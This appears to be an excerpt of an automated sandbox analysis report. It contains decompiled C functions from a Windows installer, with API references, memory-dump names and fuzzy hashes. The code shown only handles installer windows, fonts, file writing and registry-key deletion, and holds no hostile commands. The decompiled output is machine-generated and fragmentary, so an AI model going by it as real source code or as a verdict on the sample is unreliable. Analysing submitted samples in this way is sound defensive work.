                                                                        0x00404268
                                                                        0x0040426a
                                                                        0x0040426a
                                                                        0x00404272
                                                                        0x00404278
                                                                        0x00404278
                                                                        0x00404282
                                                                        0x00404287
                                                                        0x0040428a
                                                                        0x0040428f
                                                                        0x00404292
                                                                        0x00404292
                                                                        0x004042a2
                                                                        0x004042a2
                                                                        0x00000000
                                                                        0x004042a5

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                        • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                                        • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                        • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040521E, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040521E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4f4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
					}
					_t26 = lstrlenA(0x42a070);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a070;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a070)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a070, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                        0x00405224
                                                                        0x00405230
                                                                        0x00405233
                                                                        0x00405239
                                                                        0x00405245
                                                                        0x00405248
                                                                        0x0040524b
                                                                        0x00405251
                                                                        0x00405251
                                                                        0x00405257
                                                                        0x0040525f
                                                                        0x00405262
                                                                        0x0040527f
                                                                        0x00405283
                                                                        0x0040528c
                                                                        0x0040528c
                                                                        0x00405296
                                                                        0x0040529f
                                                                        0x004052ab
                                                                        0x004052b2
                                                                        0x004052b6
                                                                        0x004052b9
                                                                        0x004052cc
                                                                        0x004052da
                                                                        0x004052da
                                                                        0x004052de
                                                                        0x004052e0
                                                                        0x004052e3
                                                                        0x00000000
                                                                        0x004052e3
                                                                        0x00405264
                                                                        0x0040526c
                                                                        0x00405274
                                                                        0x0040527a
                                                                        0x00000000
                                                                        0x0040527a
                                                                        0x00405274
                                                                        0x00405262
                                                                        0x004052ed

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                        • lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                        • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,7519EA30), ref: 0040527A
                                                                        • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                        • SendMessageA.USER32 ref: 004052B2
                                                                        • SendMessageA.USER32 ref: 004052CC
                                                                        • SendMessageA.USER32 ref: 004052DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 2531174081-0
                                                                        • Opcode ID: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                                        • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                                        • Opcode Fuzzy Hash: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                                        • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404ACE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                        0x00404adc
                                                                        0x00404ae9
                                                                        0x00404aef
                                                                        0x00404b2d
                                                                        0x00404b2d
                                                                        0x00404b3c
                                                                        0x00404b43
                                                                        0x00000000
                                                                        0x00404b45
                                                                        0x00404af1
                                                                        0x00404b00
                                                                        0x00404b08
                                                                        0x00404b0b
                                                                        0x00404b1d
                                                                        0x00404b23
                                                                        0x00404b2a
                                                                        0x00000000
                                                                        0x00404b2a
                                                                        0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                        • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                                        • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                        • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402DBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41d440; // 0x53fbf
					_t11 =  *0x42944c;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                        0x00402dc7
                                                                        0x00402dd5
                                                                        0x00402ddb
                                                                        0x00402ddb
                                                                        0x00402de9
                                                                        0x00402deb
                                                                        0x00402df1
                                                                        0x00402df8
                                                                        0x00402dfa
                                                                        0x00402dfa
                                                                        0x00402e10
                                                                        0x00402e20
                                                                        0x00402e32
                                                                        0x00402e32
                                                                        0x00402e3a

                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                        • MulDiv.KERNEL32(00053FBF,00000064,?), ref: 00402E00
                                                                        • wsprintfA.USER32 ref: 00402E10
                                                                        • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                        • SetDlgItemTextA.USER32 ref: 00402E32
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 00402E0A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                        • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                                        • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                        • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E004027DF(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405AFC(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405C6B(_t50);
				_t26 = E00405C90(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f438;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403300(_t45);
						E004032EA(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                        0x004027df
                                                                        0x004027e1
                                                                        0x004027ed
                                                                        0x004027f0
                                                                        0x004027fa
                                                                        0x004027fe
                                                                        0x004027fe
                                                                        0x00402804
                                                                        0x00402811
                                                                        0x00402819
                                                                        0x0040281c
                                                                        0x00402822
                                                                        0x00402830
                                                                        0x00402835
                                                                        0x00402839
                                                                        0x0040283c
                                                                        0x00402845
                                                                        0x00402851
                                                                        0x00402855
                                                                        0x00402858
                                                                        0x00402862
                                                                        0x00402887
                                                                        0x00402869
                                                                        0x0040286e
                                                                        0x00402876
                                                                        0x0040287c
                                                                        0x00402881
                                                                        0x00402881
                                                                        0x0040288e
                                                                        0x0040288e
                                                                        0x0040289b
                                                                        0x004028a1
                                                                        0x004028b3
                                                                        0x004028b3
                                                                        0x004028b9
                                                                        0x004028b9
                                                                        0x004028c4
                                                                        0x004028c5
                                                                        0x004028c9
                                                                        0x004028cd
                                                                        0x004028d3
                                                                        0x004028d3
                                                                        0x004028da
                                                                        0x004022dd
                                                                        0x00402a5d
                                                                        0x00402a69

                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                        • GlobalFree.KERNEL32 ref: 0040288E
                                                                        • GlobalFree.KERNEL32 ref: 004028A1
                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                        • String ID:
                                                                        • API String ID: 2667972263-0
                                                                        • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                        • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                                        • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                        • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 48%
                                                                        			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406500(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                        0x00402cdb
                                                                        0x00402ce4
                                                                        0x00402ced
                                                                        0x00402cf9
                                                                        0x00402d02
                                                                        0x00402d0c
                                                                        0x00402d31
                                                                        0x00402d37
                                                                        0x00402d3c
                                                                        0x00402d3d
                                                                        0x00402d6d
                                                                        0x00402d46
                                                                        0x00402d48
                                                                        0x00402d98
                                                                        0x00402d9b
                                                                        0x00000000
                                                                        0x00402da1
                                                                        0x00402d57
                                                                        0x00402d5c
                                                                        0x00402d5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402d66
                                                                        0x00402d6b
                                                                        0x00402d6c
                                                                        0x00402d6c
                                                                        0x00402d79
                                                                        0x00402d81
                                                                        0x00402d88
                                                                        0x00000000
                                                                        0x00402db1
                                                                        0x00000000
                                                                        0x00402d90
                                                                        0x00402d1c
                                                                        0x00402d2f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402d2f
                                                                        0x00402db7

                                                                        APIs
                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CloseEnum$DeleteValue
                                                                        • String ID:
                                                                        • API String ID: 1354259210-0
                                                                        • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                        • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                                        • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                        • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                        0x00401d65
                                                                        0x00401d69
                                                                        0x00401d7e
                                                                        0x00401d6b
                                                                        0x00401d6d
                                                                        0x00401d73
                                                                        0x00401d73
                                                                        0x00401d84
                                                                        0x00401d87
                                                                        0x00401d91
                                                                        0x00401d94
                                                                        0x00401d9c
                                                                        0x00401dad
                                                                        0x00401db0
                                                                        0x00401dbb
                                                                        0x00401db2
                                                                        0x00401db4
                                                                        0x00401db4
                                                                        0x00401dbf
                                                                        0x00401dcc
                                                                        0x00401df3
                                                                        0x00401e02
                                                                        0x00401e10
                                                                        0x00401e18
                                                                        0x00401e20
                                                                        0x00401e20
                                                                        0x00401e29
                                                                        0x00401e2f
                                                                        0x004029a5
                                                                        0x004029a5
                                                                        0x00402a5d
                                                                        0x00402a69

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                        • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                                        • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                        • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 73%
                                                                        			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b848 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b84f = 1;
				 *0x40b84c = _t15 & 0x00000001;
				 *0x40b84d = _t15 & 0x00000002;
				 *0x40b84e = _t15 & 0x00000004;
				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b838);
				_push(_t18);
				_push(_t33);
				E00406055();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                        0x00401e35
                                                                        0x00401e40
                                                                        0x00401e42
                                                                        0x00401e4f
                                                                        0x00401e66
                                                                        0x00401e6b
                                                                        0x00401e78
                                                                        0x00401e7d
                                                                        0x00401e81
                                                                        0x00401e8c
                                                                        0x00401e93
                                                                        0x00401ea5
                                                                        0x00401eab
                                                                        0x00401eb0
                                                                        0x00401eba
                                                                        0x00402620
                                                                        0x00401569
                                                                        0x004029a5
                                                                        0x00402a5d
                                                                        0x00402a69

                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401E38
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                        • ReleaseDC.USER32 ref: 00401E6B
                                                                        • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID:
                                                                        • API String ID: 3808545654-0
                                                                        • Opcode ID: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                                        • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                                        • Opcode Fuzzy Hash: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
